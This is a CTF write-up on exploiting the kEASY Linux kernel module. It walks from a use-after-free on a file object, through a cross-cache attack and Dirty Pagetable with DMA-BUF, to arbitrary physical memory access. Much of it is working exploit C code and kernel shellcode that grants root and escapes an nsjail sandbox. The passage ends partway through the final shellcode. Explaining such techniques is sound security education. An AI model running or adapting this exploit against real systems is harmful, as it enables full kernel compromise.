About

I participated in the m0leCon Finals 2023 CTF, held at Politecnico di Torino, Italy, as a member of std::weak_ptr<moon>*1.

Among the pwnable challenges I solved during the CTF, a kernel pwn named kEASY was quite interesting, so I'm going to explain the exploitation technique I used to solve it.

Challenge setup

The following link has the challenge files.

Distributed files:

kernel.conf, rootfs.cpio.gz, bzImage, run.sh, keasy.c, keasy.h

Mitigations

KASLR, SMAP, SMEP, and KPTI are enabled.

    #!/bin/sh
    qemu-system-x86_64 \
        -kernel bzImage \
        -cpu qemu64,+smep,+smap,+rdrand \
        -m 4G \
        -smp 4 \
        -initrd rootfs.cpio.gz \
        -hda flag.txt \
        -append "console=ttyS0 quiet loglevel=3 oops=panic panic_on_warn=1 panic=-1 pti=on page_alloc.shuffle=1" \
        -monitor /dev/null \
        -nographic \
        -no-reboot

Mitigations such as slab freelist randomization and slab hardening are also enabled. Additionally, the given shell itself is sandboxed by nsjail, which prohibits many system calls and imposes resource limits such as the maximum number of processes.

Source code

A kernel module that defines an ioctl handler is loaded on the system. The handler is the following function:

    static long keasy_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) {
      long ret = -EINVAL;
      struct file *myfile;
      int fd;

      if (!enabled) {
        goto out;
      }
      enabled = 0;

      myfile = anon_inode_getfile("[easy]", &keasy_file_fops, NULL, 0);

      fd = get_unused_fd_flags(O_CLOEXEC);
      if (fd < 0) {
        ret = fd;
        goto err;
      }

      fd_install(fd, myfile);

      if (copy_to_user((unsigned int __user *)arg, &fd, sizeof(fd))) {
        ret = -EINVAL;
        goto err;
      }

      ret = 0;
      return ret;

    err:
      fput(myfile);
    out:
      return ret;
    }

It creates an anonymous file named [easy], and a file descriptor is assigned to it.

Once the file descriptor is assigned, its number is copied to a user-land buffer.

This feature can be called only once*2 after boot.

Vulnerability

If copy_to_user fails after the file descriptor has been installed by fd_install, execution jumps to err and fput is called.

fput decrements the reference count of a file.

The counter becomes zero in this case because the anonymous file is not shared, so the structure allocated for the file is freed.

This means that a Use-after-Free occurs if copy_to_user fails: the file itself is freed while the file descriptor is still alive in user-land.

Confirming the bug

We can easily make copy_to_user fail by passing an invalid address, which triggers the Use-after-Free.

Since the new file descriptor is always the smallest available number, we can predict it even though ioctl fails and never tells us the value.

    #include <fcntl.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/ioctl.h>
    #include <unistd.h>

    void fatal(const char *msg) {
      perror(msg);
      exit(1);
    }

    int main() {
      // Open vulnerable device
      int fd = open("/dev/keasy", O_RDWR);
      if (fd == -1)
        fatal("/dev/keasy");

      // Get dangling file descriptor
      int ezfd = fd + 1;
      if (ioctl(fd, 0, 0xdeadbeef) == 0)
        fatal("ioctl did not fail");

      // Use-after-free
      char buf[4];
      read(ezfd, buf, 4);

      return 0;
    }

We can confirm the kernel crashes when we execute the code above.

What makes the exploit hard is that the UAF occurs in a dedicated slab cache [1] instead of a generic slab cache.

A file structure is allocated from a dedicated slab cache named files_cache.

    # cat /proc/slabinfo | grep files_cache
    files_cache          920    920    704   23    4 : tunables    0    0    0 : slabdata     40     40      0

Therefore, unlike with objects allocated by kmalloc, objects other than files will not normally be placed over the freed object after the Use-after-Free, which makes the exploit difficult.
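The slabinfo line above can be read as simple arithmetic: one slab of 4 pages holds 23 objects of 704 bytes. The following is a minimal sketch of that calculation. The helper name `objs_per_slab` and the 4 KiB page size are assumptions made for illustration, and the real allocator may additionally account for alignment or metadata.

```c
#include <assert.h>
#include <stddef.h>

#define SLAB_PAGE_SIZE 4096UL /* assumption: 4 KiB pages, as on x86-64 */

/* Hypothetical helper: number of objects of `obj_size` bytes that fit in a
 * slab made of `pages_per_slab` contiguous pages (metadata is ignored). */
size_t objs_per_slab(size_t obj_size, size_t pages_per_slab) {
    assert(obj_size > 0);
    return (pages_per_slab * SLAB_PAGE_SIZE) / obj_size;
}
```

With the values printed by slabinfo, `objs_per_slab(704, 4)` gives 23, which matches the objects-per-slab column. A spray therefore has to cover well over 23 objects before a whole slab can be emptied again.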

Cross-Cache Attack

Still, we can use an exploitation technique named cross-cache attack to exploit a heap vulnerability that occurs in a dedicated cache. Several attacks build on cross-cache, such as Dirty Cred [2] and Dirty Pagetable.



The principle of the cross-cache attack is simple. Here I explain it for the case of a Use-after-Free.

First of all, we spray objects allocated in the dedicated cache, as described in ① and ② in the figure.

Secondly, we free the UAF object as in ③ *3.

Finally, if we free every sprayed object (④), the slab page itself will also be freed, since no object in that slab is in use anymore.

The buddy system in Linux manages pages, and a freed page can be reused for a different purpose later on. Therefore, we can overlap the UAF file object with a structure completely different from a file.

The Dirty Cred attack overwrites the cred structure, which manages the privileges of a process. However, we need a different attack this time, since the target is a file structure.

Dirty Pagetable

I used a technique named Dirty Pagetable to solve this challenge.

How it works

Just as Dirty Cred sets the cred structure as the attack target, Dirty Pagetable sets the page table as the attack target.

In x86-64 Linux, a 4-level page table is usually used to convert virtual addresses to physical addresses. Dirty Pagetable targets the PTE (Page Table Entry) level, which is the last level just before physical memory. In Linux, when a new PTE page is required, the page for it is also allocated from the buddy system.
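To make the 4-level translation concrete, here is a small sketch that splits a 48-bit virtual address into the four table indices and the page offset. The struct and function names are made up for this example. The field names follow the level names Linux conventionally uses (PGD, PUD, PMD, PTE).

```c
#include <stdint.h>

/* Indices into the four x86-64 paging levels for a 48-bit virtual address. */
struct pt_indices {
    unsigned pgd, pud, pmd, pte; /* 9 bits each: 512 entries per table */
    unsigned offset;             /* low 12 bits: offset inside the 4 KiB page */
};

/* Hypothetical helper: decompose a virtual address (4 KiB pages assumed). */
struct pt_indices split_vaddr(uint64_t va) {
    struct pt_indices ix;
    ix.pgd    = (unsigned)((va >> 39) & 0x1ff);
    ix.pud    = (unsigned)((va >> 30) & 0x1ff);
    ix.pmd    = (unsigned)((va >> 21) & 0x1ff);
    ix.pte    = (unsigned)((va >> 12) & 0x1ff);
    ix.offset = (unsigned)(va & 0xfff);
    return ix;
}
```

Each entry is 8 bytes, so a last-level table with 512 entries fills exactly one 4 KiB page and covers 2 MiB of virtual address space. That one page is what the attack tries to place on top of the freed slab page.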





Therefore, we can allocate a PTE on the same page where the dangling file pointer is located. The following figure describes the situation*4.

The following code overlaps a UAF object with a PTE. Remember to pin the process to a single CPU so that the slab cache of the same CPU is always used, since the machine runs with multiple cores this time.

    void bind_core(int core) {
      cpu_set_t cpu_set;
      CPU_ZERO(&cpu_set);
      CPU_SET(core, &cpu_set);
      sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
    }

    ...

    int main() {
      int file_spray[N_FILESPRAY];
      void *page_spray[N_PAGESPRAY];

      // Pin CPU (important!)
      bind_core(0);

      // Open vulnerable device
      int fd = open("/dev/keasy", O_RDWR);
      if (fd == -1)
        fatal("/dev/keasy");

      // Prepare pages (PTE not allocated at this moment)
      for (int i = 0; i < N_PAGESPRAY; i++) {
        page_spray[i] = mmap((void*)(0xdead0000UL + i*0x10000UL),
                             0x8000, PROT_READ|PROT_WRITE,
                             MAP_ANONYMOUS|MAP_SHARED, -1, 0);
        if (page_spray[i] == MAP_FAILED) fatal("mmap");
      }

      puts("[+] Spraying files...");
      // Spray file (1)
      for (int i = 0; i < N_FILESPRAY/2; i++)
        if ((file_spray[i] = open("/", O_RDONLY)) < 0) fatal("/");

      // Get dangling file descriptor
      int ezfd = file_spray[N_FILESPRAY/2-1] + 1;
      if (ioctl(fd, 0, 0xdeadbeef) == 0) // Use-after-Free
        fatal("ioctl did not fail");

      // Spray file (2)
      for (int i = N_FILESPRAY/2; i < N_FILESPRAY; i++)
        if ((file_spray[i] = open("/", O_RDONLY)) < 0) fatal("/");

      puts("[+] Releasing files...");
      // Release the page for file slab cache
      for (int i = 0; i < N_FILESPRAY; i++)
        close(file_spray[i]);

      puts("[+] Allocating PTEs...");
      // Allocate many PTEs (page fault)
      for (int i = 0; i < N_PAGESPRAY; i++)
        for (int j = 0; j < 8; j++)
          *(char*)(page_spray[i] + j*0x1000) = 'A' + j;

      getchar();
      return 0;
    }





The file structure right before it gets freed by fput:

After the PTE spray finishes, we find PTE-like data at the same address:

One of the entries points to the following physical memory, where we can find the data we wrote. This means the PTE was allocated for one of the sprayed pages.

Ideally, we want to overwrite this PTE and make a user-land virtual address point to a kernel-land physical address. How we can overwrite the PTE depends on the vulnerable object. Let's consider the case of a file structure.

Exploitation for a file structure

It is a bit hard to exploit a file structure because it has few fields we can control.

The original article [3] explains a method using dup, and we will use it as well.

A file structure has a field named f_count at offset 0x38 from the beginning.

    struct file {
        union {
            struct llist_node   f_llist;
            struct rcu_head     f_rcuhead;
            unsigned int        f_iocb_flags;
        };

        /*
         * Protects f_ep, f_flags.
         * Must not be taken from IRQ context.
         */
        spinlock_t      f_lock;
        fmode_t         f_mode;
        atomic_long_t   f_count;
        struct mutex    f_pos_lock;
    ...

f_count represents the reference count of the file object, and it is incremented when we call the dup system call to duplicate the file descriptor.

Therefore, we obtain a primitive to increment a pointer in the PTE.

So, can we simply call dup many times to make an entry in the PTE point to a kernel-land physical address?

It is not so simple, unfortunately.

Most of the physical addresses are randomized when KASLR is enabled. In addition, the physical memory allocated for user-land is located at much lower addresses than the physical memory for kernel-land, and the distance between them is large.

A process can have up to 65535 file descriptors in this environment, which limits the number of increments we can perform.

One solution is to use fork and spread the increments over several processes to bypass the limitation, but that is not possible this time because nsjail allows us to run only 2 processes.

Therefore, we need to find another way to make a user-land virtual address point to a kernel-land physical address.
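The limitation can be put into numbers. Each dup adds 1 to the overlapped entry, and the physical page encoded in a PTE only advances after 0x1000 increments. The sketch below computes how far a single process could push an entry under a given descriptor limit. The function names are hypothetical and exist only for this illustration.

```c
#include <stdint.h>

#define INCS_PER_PAGE 0x1000ULL /* +0x1000 on a PTE moves it to the next 4 KiB page */

/* Hypothetical helper: number of whole pages a PTE can be advanced
 * when at most `max_increments` dup() calls are available. */
uint64_t max_page_shift(uint64_t max_increments) {
    return max_increments / INCS_PER_PAGE;
}

/* The same bound expressed as a physical distance in bytes. */
uint64_t max_byte_shift(uint64_t max_increments) {
    return max_page_shift(max_increments) * INCS_PER_PAGE;
}
```

With the 65535 descriptors mentioned above, `max_page_shift(65535)` is 15, so the entry can move by at most 15 pages (60 KiB). That is far too little to bridge the gap between user-land and kernel-land physical memory.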

UAF in physical memory



So far, the UAF file object is located at the same physical address as a PTE, as described in the figure below:

Here, if we call dup 0x1000 times, the entry at the location corresponding to f_count in the PTE will point to the next physical page, so that two PTE entries end up pointing to the same physical address.

After this modification, we can find the overlapping page by reading each sprayed page and checking whether the data we wrote to it has changed.
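The effect of the 0x1000 dup calls on the overlapped entry can be modelled in a few lines. This is only a user-land model under stated assumptions: the helper names are invented, the example entry value in the usage note is made up, and the slot calculation assumes the freed file object starts at the beginning of the page table page.

```c
#include <stdint.h>

#define PTE_ADDR_MASK 0x000ffffffffff000ULL /* bits 12..51: physical page address */

/* Physical page address encoded in a page table entry. */
uint64_t pte_phys(uint64_t pte) {
    return pte & PTE_ADDR_MASK;
}

/* Model of `n` dup() calls while f_count overlaps the 8-byte entry `pte`:
 * every call adds 1 to the raw 64-bit value. */
uint64_t pte_after_dups(uint64_t pte, uint64_t n) {
    return pte + n;
}

/* Entries are 8 bytes wide, so a byte offset maps to slot offset / 8.
 * f_count at offset 0x38 therefore lands on slot 7. */
unsigned slot_for_offset(unsigned byte_offset) {
    return byte_offset / 8;
}
```

For a made-up entry such as 0x8000000012345067, 0x1000 increments leave the low flag bits (0x067) untouched and move the physical address from 0x12345000 to 0x12346000. Slot 7 is also why the search code checks the 8th page (`7*0x1000`) of every sprayed region.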





      /**
       * 4. Modify PTE entry to overlap 2 physical pages
       */
      // Increment physical address
      for (int i = 0; i < 0x1000; i++)
        if (dup(ezfd) < 0)
          fatal("dup");

      puts("[+] Searching for overlapping page...");
      // Search for page that overlaps with other physical page
      void *evil = NULL;
      for (int i = 0; i < N_PAGESPRAY; i++) {
        // We wrote 'H'(='A'+7) but if it changes the PTE overlaps with the file
        if (*(char*)(page_spray[i] + 7*0x1000) != 'A' + 7) { // +38h: f_count
          evil = page_spray[i] + 0x7000;
          printf("[+] Found overlapping page: %p\n", evil);
          break;
        }
      }
      if (evil == NULL) fatal("target not found :(");

We can detect the overlapping pages as shown below:



Checking the physical address of the detected page, we find that 2 user-land virtual addresses point to the same physical address.

Note that the overlap itself is not what matters here. What matters is that we now know which user-land virtual address corresponds to the PTE entry we can corrupt.

Arbitrary Physical Address Read/Write

As mentioned earlier, we cannot reach the kernel-land physical memory simply by calling dup many times, because of the distance between user-land and kernel-land physical memory.

To resolve this problem, I used DMA-BUF Heap this time. (The original article also mentions io_uring, but it is not available because of nsjail.)

DMA-BUF [4] is memory that multiple devices can share for fast and secure access.

We can open the DMA heap device at /dev/dma_heap/system to control DMA-BUF Heap.

By calling the DMA_HEAP_IOCTL_ALLOC ioctl on this device, we can allocate memory that can be mapped to user-land.

The page mapped through this ioctl is different from a page mapped by an ordinary mmap.

It will be allocated on physical memory close to PTEs *5.
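When the kernel header for DMA-BUF heaps is not at hand, the request number for DMA_HEAP_IOCTL_ALLOC can be derived by hand. The sketch below follows the usual Linux ioctl number encoding for x86-64 (direction, size, type, number). The helper names `ioc_encode` and `dma_heap_ioctl_alloc` are assumptions for this example, and the struct is written out with fixed-width types instead of being taken from a header.

```c
#include <stdint.h>

/* Argument of DMA_HEAP_IOCTL_ALLOC, written with fixed-width types (24 bytes). */
struct dma_heap_allocation_data {
    uint64_t len;        /* size of the allocation in bytes */
    uint32_t fd;         /* filled in by the kernel: new dma-buf fd */
    uint32_t fd_flags;   /* flags for that fd, e.g. O_RDWR */
    uint64_t heap_flags; /* heap-specific flags, 0 here */
};

/* Linux ioctl number layout on x86-64:
 * dir[31:30] | size[29:16] | type[15:8] | nr[7:0] */
#define IOC_DIR_WRITE 1U
#define IOC_DIR_READ  2U

uint32_t ioc_encode(uint32_t dir, uint32_t type, uint32_t nr, uint32_t size) {
    return (dir << 30) | (size << 16) | (type << 8) | nr;
}

/* Read/write ioctl, magic 'H', command number 0. */
uint32_t dma_heap_ioctl_alloc(void) {
    return ioc_encode(IOC_DIR_READ | IOC_DIR_WRITE, 'H', 0,
                      (uint32_t)sizeof(struct dma_heap_allocation_data));
}
```

The result is 0xc0184800, the same constant the final exploit defines by hand.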



So, if we place the entry for a DMA-BUF Heap page at the PTE slot that we can corrupt with f_count, we can realize the following situation.

(We have to allocate the DMA-BUF Heap page in the middle of the PTE spray so that another PTE is allocated right next to the DMA page.)

Since we already know which user-land page corresponds to the corruptible PTE entry, we munmap it and mmap the DMA-BUF Heap page at the same address, which makes f_count overlap with the PTE entry for the DMA-BUF Heap page.

What is important is that a PTE exists next to the page allocated with DMA-BUF Heap.

Therefore, if we call dup 0x1000 times again to increment f_count, the DMA-BUF Heap page mapped to user-land will point to a PTE.

Since we can read and write the DMA-BUF page mapped to user-land, we obtain a primitive to fully control a PTE. We can then modify its entries and make one of them point to an arbitrary physical address, including kernel-land.

This is how we can achieve arbitrary physical address read/write.
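Once a PTE page is writable from user-land, pointing an entry at a chosen physical page is a matter of composing the right 64-bit value. The following sketch builds such an entry from the standard x86-64 flag bits. The macro and function names are invented for illustration, and the flag combination is the one that yields the 0x8000000000000067 pattern used in the exploit code of this article.

```c
#include <stdint.h>

/* x86-64 page table entry flag bits */
#define PTE_PRESENT  (1ULL << 0)
#define PTE_WRITE    (1ULL << 1)
#define PTE_USER     (1ULL << 2)
#define PTE_ACCESSED (1ULL << 5)
#define PTE_DIRTY    (1ULL << 6)
#define PTE_NX       (1ULL << 63)

/* Hypothetical helper: entry for a user-accessible, writable,
 * non-executable mapping of the 4 KiB page that contains `phys`. */
uint64_t make_pte(uint64_t phys) {
    return (phys & ~0xfffULL)
         | PTE_NX | PTE_DIRTY | PTE_ACCESSED
         | PTE_USER | PTE_WRITE | PTE_PRESENT;
}
```

For example, `make_pte(0x9c000)` yields 0x800000000009c067, the value written through the DMA-BUF mapping in the leak step later on.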

If we run the following code, the page allocated with DMA-BUF will be adjacent to a PTE.

      /**
       * 3. Overlap UAF file with PTE
       */
      puts("[+] Allocating PTEs...");
      // Allocate many PTEs (1)
      for (int i = 0; i < N_PAGESPRAY/2; i++)
        for (int j = 0; j < 8; j++)
          *(char*)(page_spray[i] + j*0x1000) = 'A' + j;

      // Allocate DMA-BUF heap
      int dma_buf_fd = -1;
      struct dma_heap_allocation_data data;
      data.len = 0x1000;
      data.fd_flags = O_RDWR;
      data.heap_flags = 0;
      data.fd = 0;
      if (ioctl(dmafd, DMA_HEAP_IOCTL_ALLOC, &data) < 0)
        fatal("DMA_HEAP_IOCTL_ALLOC");
      printf("[+] dma_buf_fd: %d\n", dma_buf_fd = data.fd);

      // Allocate many PTEs (2)
      for (int i = N_PAGESPRAY/2; i < N_PAGESPRAY; i++)
        for (int j = 0; j < 8; j++)
          *(char*)(page_spray[i] + j*0x1000) = 'A' + j;

      /**
       * 4. Modify PTE entry to overlap 2 physical pages
       */
      // Increment physical address
      for (int i = 0; i < 0x1000; i++)
        if (dup(ezfd) < 0)
          fatal("dup");

      puts("[+] Searching for overlapping page...");
      // Search for page that overlaps with other physical page
      void *evil = NULL;
      for (int i = 0; i < N_PAGESPRAY; i++) {
        // We wrote 'H'(='A'+7) but if it changes the PTE overlaps with the file
        if (*(char*)(page_spray[i] + 7*0x1000) != 'A' + 7) { // +38h: f_count
          evil = page_spray[i] + 0x7000;
          printf("[+] Found overlapping page: %p\n", evil);
          break;
        }
      }
      if (evil == NULL) fatal("target not found :(");

      // Place PTE entry for DMA buffer onto controllable PTE
      puts("[+] Remapping...");
      munmap(evil, 0x1000);
      void *dmabuf = mmap(evil, 0x1000, PROT_READ | PROT_WRITE,
                          MAP_SHARED | MAP_POPULATE, dma_buf_fd, 0);
      *(char*)dmabuf = '0';



Checking in gdb, we can see that a PTE is allocated at the address where the dangling file object was, and that the physical address of the DMA-BUF page is located at the offset corresponding to f_count.

Additionally, the page next to the DMA-BUF page looks like another PTE.

Therefore, we can call dup 0x1000 times to corrupt a PTE.



      /**
       * Get physical AAR/AAW
       */
      // Corrupt physical address of DMA-BUF
      for (int i = 0; i < 0x1000; i++)
        if (dup(ezfd) < 0)
          fatal("dup");
      printf("[+] DMA-BUF now points to PTE: 0x%016lx\n", *(size_t*)dmabuf);

Leaking physical base address

Reading and writing through a physical address will not fail regardless of the permissions set on the kernel's own mappings. So, we can search for specific machine code or magic numbers to locate the physical address of the kernel.

Although it's already 2024, we can still find some fixed physical addresses on both Linux and Windows.

The pages around here (physical address 0x9c000 in the code below) are always at a fixed location, and leftover page table data remains in them. (Credit to shift_crops, who found it during HITCON.) This page table holds a pointer to a kernel-land physical address, which is useful for leaking the physical base address of the kernel.

      // Leak kernel physical base
      void *wwwbuf = NULL;
      *(size_t*)dmabuf = 0x800000000009c067;
      for (int i = 0; i < N_PAGESPRAY; i++) {
        if (page_spray[i] == evil) continue;
        if (*(size_t*)page_spray[i] > 0xffff) {
          wwwbuf = page_spray[i];
          printf("[+] Found victim page table: %p\n", wwwbuf);
          break;
        }
      }
      size_t phys_base = ((*(size_t*)wwwbuf) & ~0xfff) - 0x1c04000;
      printf("[+] Physical kernel base address: 0x%016lx\n", phys_base);

Escaping from nsjail

This time we need to escape from nsjail in addition to escalating privileges. Since that is complicated to do with data-only writes, let's execute shellcode in kernel space.

Because we have an AAW primitive on physical memory, we can simply overwrite the machine code of some function in the Linux kernel with our shellcode.

I modified do_symlinkat, which can be called from inside nsjail.

We can call the symlink function in C to reach this kernel function.

Refer to [5] for what the shellcode is doing.

    init_cred         equ 0x1445ed8
    commit_creds      equ 0x00ae620
    find_task_by_vpid equ 0x00a3750
    init_nsproxy      equ 0x1445ce0
    switch_task_namespaces equ 0x00ac140
    init_fs                equ 0x1538248
    copy_fs_struct         equ 0x027f890
    kpti_bypass            equ 0x0c00f41

    _start:
      endbr64
      call a
    a:
      pop r15
      sub r15, 0x24d4c9

      ; commit_creds(init_cred) [3]
      lea rdi, [r15 + init_cred]
      lea rax, [r15 + commit_creds]
      call rax

      ; task = find_task_by_vpid(1) [4]
      mov edi, 1
      lea rax, [r15 + find_task_by_vpid]
      call rax

      ; switch_task_namespaces(task, init_nsproxy) [5]
      mov rdi, rax
      lea rsi, [r15 + init_nsproxy]
      lea rax, [r15 + switch_task_namespaces]
      call rax

      ; new_fs = copy_fs_struct(init_fs) [6]
      lea rdi, [r15 + init_fs]
      lea rax, [r15 + copy_fs_struct]
      call rax
      mov rbx, rax

      ; current = find_task_by_vpid(getpid())
      mov rdi, 0x1111111111111111   ; will be fixed at runtime
      lea rax, [r15 + find_task_by_vpid]
      call rax

      ; current->fs = new_fs [8]
      mov [rax + 0x740], rbx

      ; kpti trampoline [9]
      xor eax, eax
      mov [rsp+0x00], rax
      mov [rsp+0x08], rax
      mov rax, 0x2222222222222222   ; win
      mov [rsp+0x10], rax
      mov rax, 0x3333333333333333   ; cs
      mov [rsp+0x18], rax
      mov rax, 0x4444444444444444   ; rflags
      mov [rsp+0x20], rax
      mov rax, 0x5555555555555555   ; stack
      mov [rsp+0x28], rax
      mov rax, 0x6666666666666666   ; ss
      mov [rsp+0x30], rax
      lea rax, [r15 + kpti_bypass]
      jmp rax

      int3
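The repeated-byte immediates in the shellcode (0x1111..., 0x2222..., and so on) are placeholders that get replaced at runtime with the PID, the return address, and the saved user-land register values. The sketch below shows one way to patch such a placeholder. The function name `patch_imm64` is hypothetical, and it uses a plain search loop instead of memmem so that it does not depend on a GNU extension.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical helper: find the first run of eight `marker` bytes in `code`
 * and overwrite it with `value` (stored in host byte order, which is
 * little-endian on x86-64). Returns 0 on success, -1 if no run is found. */
int patch_imm64(unsigned char *code, size_t len,
                unsigned char marker, uint64_t value) {
    unsigned char pattern[8];
    memset(pattern, marker, sizeof(pattern));

    for (size_t i = 0; i + sizeof(pattern) <= len; i++) {
        if (memcmp(code + i, pattern, sizeof(pattern)) == 0) {
            memcpy(code + i, &value, sizeof(value)); /* safe for unaligned targets */
            return 0;
        }
    }
    return -1;
}
```

A call such as `patch_imm64(shellcode, sizeof(shellcode), 0x11, getpid())` would fill in the first placeholder. Checking the return value avoids writing through a NULL pointer when a marker is missing.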

Here is the final exploit.

    #define _GNU_SOURCE
    #include <fcntl.h>
    #include <sched.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sys/ioctl.h>
    #include <sys/mman.h>
    #include <sys/types.h>
    #include <unistd.h>

    #define N_PAGESPRAY 0x200
    #define N_FILESPRAY 0x100

    #define DMA_HEAP_IOCTL_ALLOC 0xc0184800

    typedef unsigned long long u64;
    typedef unsigned int u32;
    struct dma_heap_allocation_data {
      u64 len;
      u32 fd;
      u32 fd_flags;
      u64 heap_flags;
    };

    void fatal(const char *msg) {
      perror(msg);
      exit(1);
    }

    void bind_core(int core) {
      cpu_set_t cpu_set;
      CPU_ZERO(&cpu_set);
      CPU_SET(core, &cpu_set);
      sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
    }

    unsigned long user_cs, user_ss, user_rsp, user_rflags;
    static void save_state() {
      asm(
          "movq %%cs, %0\n"
          "movq %%ss, %1\n"
          "movq %%rsp, %2\n"
          "pushfq\n"
          "popq %3\n"
          : "=r"(user_cs), "=r"(user_ss), "=r"(user_rsp), "=r"(user_rflags)
          :
          : "memory");
    }

    int fd, dmafd, ezfd = -1;

    static void win() {
      char buf[0x100];
      int fd = open("/dev/sda", O_RDONLY);
      if (fd < 0) {
        puts("[-] Lose...");
      } else {
        puts("[+] Win!");
        read(fd, buf, 0x100);
        write(1, buf, 0x100);
        puts("[+] Done");
      }
      exit(0);
    }

    int main() {
      int file_spray[N_FILESPRAY];
      void *page_spray[N_PAGESPRAY];

      /**
       * 1. Setup
       */
      // Pin CPU (important!)
      bind_core(0);
      save_state();

      // Open vulnerable device
      int fd = open("/dev/keasy", O_RDWR);
      if (fd == -1)
        fatal("/dev/keasy");

      // Open DMA-BUF
      int dmafd = creat("/dev/dma_heap/system", O_RDWR);
      if (dmafd == -1)
        fatal("/dev/dma_heap/system");

      // Prepare pages (PTE not allocated at this moment)
      for (int i = 0; i < N_PAGESPRAY; i++) {
        page_spray[i] = mmap((void*)(0xdead0000UL + i*0x10000UL),
                             0x8000, PROT_READ|PROT_WRITE,
                             MAP_ANONYMOUS|MAP_SHARED, -1, 0);
        if (page_spray[i] == MAP_FAILED) fatal("mmap");
      }

      /**
       * 2. Release the page where dangling file points
       */
      puts("[+] Spraying files...");
      // Spray file (1)
      for (int i = 0; i < N_FILESPRAY/2; i++)
        if ((file_spray[i] = open("/", O_RDONLY)) < 0) fatal("/");

      // Get dangling file descriptor
      int ezfd = file_spray[N_FILESPRAY/2-1] + 1;
      if (ioctl(fd, 0, 0xdeadbeef) == 0) // Use-after-Free
        fatal("ioctl did not fail");

      // Spray file (2)
      for (int i = N_FILESPRAY/2; i < N_FILESPRAY; i++)
        if ((file_spray[i] = open("/", O_RDONLY)) < 0) fatal("/");

      puts("[+] Releasing files...");
      // Release the page for file slab cache
      for (int i = 0; i < N_FILESPRAY; i++)
        close(file_spray[i]);

      /**
       * 3. Overlap UAF file with PTE
       */
      puts("[+] Allocating PTEs...");
      // Allocate many PTEs (1)
      for (int i = 0; i < N_PAGESPRAY/2; i++)
        for (int j = 0; j < 8; j++)
          *(char*)(page_spray[i] + j*0x1000) = 'A' + j;

      // Allocate DMA-BUF heap
      int dma_buf_fd = -1;
      struct dma_heap_allocation_data data;
      data.len = 0x1000;
      data.fd_flags = O_RDWR;
      data.heap_flags = 0;
      data.fd = 0;
      if (ioctl(dmafd, DMA_HEAP_IOCTL_ALLOC, &data) < 0)
        fatal("DMA_HEAP_IOCTL_ALLOC");
      printf("[+] dma_buf_fd: %d\n", dma_buf_fd = data.fd);

      // Allocate many PTEs (2)
      for (int i = N_PAGESPRAY/2; i < N_PAGESPRAY; i++)
        for (int j = 0; j < 8; j++)
          *(char*)(page_spray[i] + j*0x1000) = 'A' + j;

      /**
       * 4. Modify PTE entry to overlap 2 physical pages
       */
      // Increment physical address
      for (int i = 0; i < 0x1000; i++)
        if (dup(ezfd) < 0)
          fatal("dup");

      puts("[+] Searching for overlapping page...");
      // Search for page that overlaps with other physical page
      void *evil = NULL;
      for (int i = 0; i < N_PAGESPRAY; i++) {
        // We wrote 'H'(='A'+7) but if it changes the PTE overlaps with the file
        if (*(char*)(page_spray[i] + 7*0x1000) != 'A' + 7) { // +38h: f_count
          evil = page_spray[i] + 0x7000;
          printf("[+] Found overlapping page: %p\n", evil);
          break;
        }
      }
      if (evil == NULL) fatal("target not found :(");

      // Place PTE entry for DMA buffer onto controllable PTE
      puts("[+] Remapping...");
      munmap(evil, 0x1000);
      void *dmabuf = mmap(evil, 0x1000, PROT_READ | PROT_WRITE,
                          MAP_SHARED | MAP_POPULATE, dma_buf_fd, 0);
      *(char*)dmabuf = '0';

      /**
       * Get physical AAR/AAW
       */
      // Corrupt physical address of DMA-BUF
      for (int i = 0; i < 0x1000; i++)
        if (dup(ezfd) < 0)
          fatal("dup");
      printf("[+] DMA-BUF now points to PTE: 0x%016lx\n", *(size_t*)dmabuf);

      // Leak kernel physical base
      void *wwwbuf = NULL;
      *(size_t*)dmabuf = 0x800000000009c067;
      for (int i = 0; i < N_PAGESPRAY; i++) {
        if (page_spray[i] == evil) continue;
        if (*(size_t*)page_spray[i] > 0xffff) {
          wwwbuf = page_spray[i];
          printf("[+] Found victim page table: %p\n", wwwbuf);
          break;
        }
      }
      size_t phys_base = ((*(size_t*)wwwbuf) & ~0xfff) - 0x1c04000;
      printf("[+] Physical kernel base address: 0x%016lx\n", phys_base);

      /**
       * Overwrite do_symlinkat
       */
      puts("[+] Overwriting do_symlinkat...");
      size_t phys_func = phys_base + 0x24d4c0;
      *(size_t*)dmabuf = (phys_func & ~0xfff) | 0x8000000000000067;
      char shellcode[] = {
        0xf3, 0x0f, 0x1e, 0xfa,                   // endbr64
        0xe8, 0x00, 0x00, 0x00, 0x00,             // call a
        0x41, 0x5f,                               // pop r15
        0x49, 0x81, 0xef, 0xc9, 0xd4, 0x24, 0x00, // sub r15, 0x24d4c9
        0x49, 0x8d, 0xbf, 0xd8, 0x5e, 0x44, 0x01, // lea rdi, [r15 + init_cred]
        0x49, 0x8d, 0x87, 0x20, 0xe6, 0x0a, 0x00, // lea rax, [r15 + commit_creds]
        0xff, 0xd0,                               // call rax
        0xbf, 0x01, 0x00, 0x00, 0x00,             // mov edi, 1
        0x49, 0x8d, 0x87, 0x50, 0x37, 0x0a, 0x00, // lea rax, [r15 + find_task_by_vpid]
        0xff, 0xd0,                               // call rax
        0x48, 0x89, 0xc7,                         // mov rdi, rax
        0x49, 0x8d, 0xb7, 0xe0, 0x5c, 0x44, 0x01, // lea rsi, [r15 + init_nsproxy]
        0x49, 0x8d, 0x87, 0x40, 0xc1, 0x0a, 0x00, // lea rax, [r15 + switch_task_namespaces]
        0xff, 0xd0,                               // call rax
        0x49, 0x8d, 0xbf, 0x48, 0x82, 0x53, 0x01, // lea rdi, [r15 + init_fs]
        0x49, 0x8d, 0x87, 0x90, 0xf8, 0x27, 0x00, // lea rax, [r15 + copy_fs_struct]
        0xff, 0xd0,                               // call rax
        0x48, 0x89, 0xc3,                         // mov rbx, rax
        0x48, 0xbf, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, // mov rdi, <pid>
        0x49, 0x8d, 0x87, 0x50, 0x37, 0x0a, 0x00, // lea rax, [r15 + find_task_by_vpid]
        0xff, 0xd0,                               // call rax
        0x48, 0x89, 0x98, 0x40, 0x07, 0x00, 0x00, // mov [rax + 0x740], rbx
        0x31, 0xc0,                               // xor eax, eax
